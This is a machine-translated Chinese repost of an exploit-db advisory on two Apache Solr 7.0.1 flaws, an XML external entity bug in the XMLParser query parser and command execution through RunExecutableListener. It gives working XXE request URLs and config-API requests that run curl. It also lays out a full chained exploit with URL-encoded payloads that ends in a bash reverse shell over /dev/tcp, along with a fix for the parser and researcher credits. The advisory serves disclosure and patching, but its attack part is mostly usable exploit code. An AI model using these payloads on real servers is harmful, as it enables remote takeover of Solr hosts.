客服QQ:872490018 服务时间:9:00-21:00

当前位置:首页 > 安全 > 业界 > 正文

Apache Solr 7.0.1 XML外部实体扩展/远程执行代码
作者:
2017年10月19日 15:36:55
5860 次阅读
来源: 爱尖刀

原文地址:https://www.exploit-db.com/exploits/43009/

翻译如有出处请联系小编~

第一个漏洞:XML外部实体扩展(deftype = XMLParser)

Lucene包含一个查询解析器,它能够使用XML数据结构创建完整的Lucene查询。从5.1版开始支持“Solr搜索查询的XML查询分析器。

问题是,Lucene XML解析器没有明确禁止DOCTYPE声明和外部实体膨胀。可以在XML文档中包含特殊的实体,即指向外部文件(via file://)或外部URL(via http://):

使用示例:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"'><a></a>'}
 

 

当Solr是解析这个请求,它使一个HTTP请求并将其内容http://xxx.s.artsploit.com/xxx DOCTYPE定义。

考虑到我们可以在搜索查询中定义解析器类型,这通常来自不可信的用户输入,例如网站上的搜索字段。它可以使任意的HTTP请求当地Solr实例并绕过防火墙的限制外部攻击者。

例如,此漏洞可能是用户将恶意数据发送到“/upload”处理程序:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}

这个漏洞也可以被利用为Blind XXE使用FTP包装为了从solrserver任意读取本地文件。

易受攻击的代码位置:

/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      doc = db.parse(pXmlFile);
    }

 

重现步骤:

1、设置一个监听任意端口使用netcat命令“nc -lv 4444”

2、开放

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}

 

3、你会看到在你的netcat听众Solr服务器请求。它证明了DOCTYPE声明并解决。

整治建议:

考虑添加以下行/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java:

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      //protect from XXE attacks
      dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
      dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
      dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
      
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      doc = db.parse(pXmlFile);
    }

相关链接:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

CVSS v2 base score: 9.0
(AV:N/AC:L/Au:N/C:C/I:P/A:P)

第二:远程代码执行漏洞(添加侦听器:runexecutablelistener)

Solr”runexecutablelistener”类可以用来对具体事件的执行任意命令,例如在每个更新查询。问题是这样的侦听器可以通过使用添加侦听器命令的API来启用任何参数。

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198
 
{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"ANYCOMMAND",
    "dir":"/usr/bin/",
    "args":["ANYARGS"]
  }
}

参数“exe”、“args”和“dir”可以制作通过HTTP请求中修改集合的配置。这意味着任何人谁可以发送一个HTTP请求来发布API能够执行任意命令时,“postcommit”事件被触发。它会导致远程攻击者执行任意远程代码。

重现步骤:

步骤1、创建一个新集合:

http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2

步骤2、设置一个监听任意端口使用netcat命令“nc -lv 4444”

步骤3、添加一个新的runexecutablelistener听监听为收集“exe”属性内容运行命令的名称(“/usr/bin/curl”)和“args”属性内容”http://localhost:4444/executed”请求攻击者的netcat监听的价值:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198
 
{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"curl",
    "dir":"/usr/bin/",
    "args":["http://localhost:4444/executed"]
  }
}

步骤4、更新“newcollection”触发执行RunExecutableListener:

POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 19
 
[{"id":"test"}]

步骤5、你会看到在你的netcat听众Solr服务器请求。它证明了在服务器上执行旋度命令。

CVSS v2 base score: 10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)

总结:

通过把这两个漏洞,外部攻击者可以实现远程执行代码甚至不需要直接访问Solr服务器。唯一的要求是,攻击者应该能够指定查询的一部分到“q”。

搜索参数(这是一个很多人使用Solr的Web应用程序的情况下)。

让我们说,我们有一个攻击者只能发送搜索查询(“Q”param)到”/select“Solr的终点。

下面是完整的开发场景:

步骤1。借助XXE创造新的集合。如果攻击者已经知道任何集合名,则可以跳过此步骤。

http://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20

无URL编码:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2"><a></a>'}

步骤2。建立一个netcat的听众”nc -lv 4444”

步骤3。添加一个新的runexecutablelistener监听通过XXE

http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%73%65%6c%65%63%74%3f%71%3d%78%78%78%26%71%74%3d%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%63%6f%6e%66%69%67%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%32%35%37%62%25%32%35%32%32%25%32%35%36%31%25%32%35%36%34%25%32%35%36%34%25%32%35%32%64%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%37%62%25%32%35%32%32%25%32%35%36%35%25%32%35%37%36%25%32%35%36%35%25%32%35%36%65%25%32%35%37%34%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%30%25%32%35%36%66%25%32%35%37%33%25%32%35%37%34%25%32%35%34%33%25%32%35%36%66%25%32%35%36%64%25%32%35%36%64%25%32%35%36%39%25%32%35%37%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%65%25%32%35%36%31%25%32%35%36%64%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%36%65%25%32%35%36%35%25%32%35%37%37%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%33%25%32%35%36%63%25%32%35%36%31%25%32%35%37%33%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%66%25%32%35%36%63%25%32%35%37%32%25%32%35%32%65%25%32%35%35%32%25%32%35%37%35%25%32%35%36%65%25%32%35%34%35%25%32%35%37%38%25%32%35%36%35%25%32%35%36%33%25%32%35%37%35%25%32%35%37%34%25%32%35%36%31%25%32%35%36%32%25%32%35%36%63%25%32%35%36%35%25%32%35%34%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%37%38%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%34%25%32%35%36%39%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%31%25%32%35%37%32%25%32%35%36%37%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%35%62%25%32%35%32%32%25%32%35%32%64%25%32%35%36%33%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%34%25%32%35%34%30%25%32%35%37%63%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%65%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%36%33%25%32%35%36%38%25%32%35%36%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%36%32%25%32%35%36%31%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%64%25%32%35%36%39%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%65%25%32%35%32%36%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%34%25%32%35%36%35%25%32%35%37%36%25%32%35%32%66%25%32%35%37%34%25%32%35%36%33%25%32%35%37%30%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%37%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%31%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%33%25%32%35%33%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%30%25%32%35%33%65%25%32%35%32%36%25%32%35%33%31%25%32%35%32%32%25%32%35%35%64%25%32%35%37%64%25%32%35%37%64%26%73%68%61%72%64%73%3d%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%22%3e%3c%61%3e%3c%2f%61%3e%27%7d

无URL编码:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","/bin/bash","-i",">&","/dev/tcp/127.0.0.1/1234","0>&1"]}}&shards=localhost:8983/"><a></a>'}

正如您可能注意到的,为了更新配置,我们需要向应用程序发送POST请求。但通过使用XXE漏洞我们只能发送HTTP GET请求。有一个特殊的窍门是用在这里:如果Solr接收”/select?q=123&qt=/xxx&shards=localhost:8983/“GET请求,它实际上把它张贴并将这个请求的碎片中指定的“shards”参数。这也很酷,它覆盖的URL查询由“QT”参数,所以我们可以把它从“/select”到“/config”。

HTTP请求结果,登录localhost:8983 需要stream.body=”our_value”PST请求。这正是我们在开发方面所需要的。

步骤3。更新“newcollection”通过XXE触发执行Runexecutablelistener

http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%75%70%64%61%74%65%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%35%62%25%37%62%25%32%32%25%36%39%25%36%34%25%32%32%25%33%61%25%32%32%25%34%31%25%34%31%25%34%31%25%32%32%25%37%64%25%35%64%26%63%6f%6d%6d%69%74%3d%74%72%75%65%26%6f%76%65%72%77%72%69%74%65%3d%74%72%75%65%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20

无URL编码:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/update?stream.body=[{"id":"AAA"}]&commit=true&overwrite=true"><a></a>'} 

步骤5。当“bin/sh c $@|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1“执行命令时更新,一个新的shell会话将在netcat的听众打开。攻击者可以执行任何命令在服务器上运行Solr。

在所有的三个请求Solr不同误差响应,但所有这些错误都发生在所期望的行动的执行。

所有这些漏洞都用默认的云配置最新版本的Apache Solr测试(bin/solr start -e cloud -noprompt)

这些漏洞的发现是由:

Michael Stepankin(JPMorgan Chase)

Olga Barinova(纽约数码科技)


[广告]赞助链接:

舆情监测,互联网舆情首选查舆情:http://www.chayuqing.com/
四季很好,只要有你,文娱排行榜:http://www.yaopaiming.com/

  • 网络尖刀
    公众号:mcbang_com
    数据、技术、运营
  • 知安
    公众号:knowsafe
    黑客、技术、安全
  • 查舆情
    公众号:chayuqing_com
    舆情、文娱、品牌

Copyright © 2013 IjianDao.Com,All Rights Reserved

网络尖刀 版权所有 京ICP备14006288号-3